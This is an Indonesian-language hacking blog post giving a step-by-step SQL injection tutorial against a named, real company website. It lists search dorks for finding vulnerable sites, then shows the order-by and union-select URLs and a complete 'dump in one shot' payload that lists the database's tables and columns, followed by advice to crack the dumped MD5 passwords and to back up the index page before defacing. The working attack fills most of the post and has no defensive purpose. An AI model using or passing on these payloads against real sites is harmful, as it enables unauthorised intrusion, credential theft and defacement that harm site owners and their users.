Hae gaes:v welcome to my blog
Kali ini gw bakal ngasih tau cara inject web bug sqli with dios(dump in one shot)
Pertama2 kita dorking dulu
Dork:
-page.php?id=
-Ext:php inurl:= site:.com
kembangin lagi biar dapet prawan:D
http://www.kabelindo.co.id/readnews.php?id=4
Ini contoh web yg vuln sqli gw males ngedork jdi cari yg dah jebol aja hehehe:v
Nah abis itu kita kasih tanda petik ( ' ) dibelakang url nya
http://www.kabelindo.co.id/readnews.php?id=4'
Nah klo ada kata2 You have an error in your SQL syntax;
Berarti web itu vuln:v kita lanjut cari nomer togel make
+order+by+1
Misal
http://www.kabelindo.co.id/readnews.php?id=4+order+by+1--+
http://www.kabelindo.co.id/readnews.php?id=4+order+by+2--+
http://www.kabelindo.co.id/readnews.php?id=4+order+by+3--+
http://www.kabelindo.co.id/readnews.php?id=4+order+by+4--+
http://www.kabelindo.co.id/readnews.php?id=4+order+by+5--+
http://www.kabelindo.co.id/readnews.php?id=4+order+by+6--+
Nah sampe d 6 gaada coloum
Brarti colomnya cuman nyampe 5
Nah skrg dah tau jumlah kolom abis itu kita cari angka togel nya:v make
+union+select+1,2,3,4,5--+
(1,2,3,4,5) itu tegantung jumlah kolom yg ada tadi klo nyampe 10 ya tulis sampe 10
Nah nih penting bgt klo lu lagi cari togel jgn lupa kasih tanda ( - ) misal
http://www.kabelindo.co.id/readnews.php?id=-4+union+select+1,2,3,4,5--+
Nah abis itu lu bakal nemu Angka togel :v
Nah abis itu kita dump kolom nya make dios
Contoh :.
http://www.kabelindo.co.id/readnews.php?id=-4+union+select+1,(tempelin dios lu),3,4,5--+
Nah skrg masukin dios di angka togel tadi
Nah gini
http://www.kabelindo.co.id/readnews.php?id=-4+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5--+
Baca Juga • hackbar Online Sqli manual
Nah abis itu klo lu berhasil maka akan keluar bnyk coloum
Klo udh keluar tinggal dump deh table yg lu mau :D
Dios???Disini
Klo udh dapet yg di dump biasanya passwordnya masih berbentuk md5 kita hash dulu Disini
Ok sekian dari gw kalo ada salah kata ya biasa la kntl
kalo depes jn lupa backup index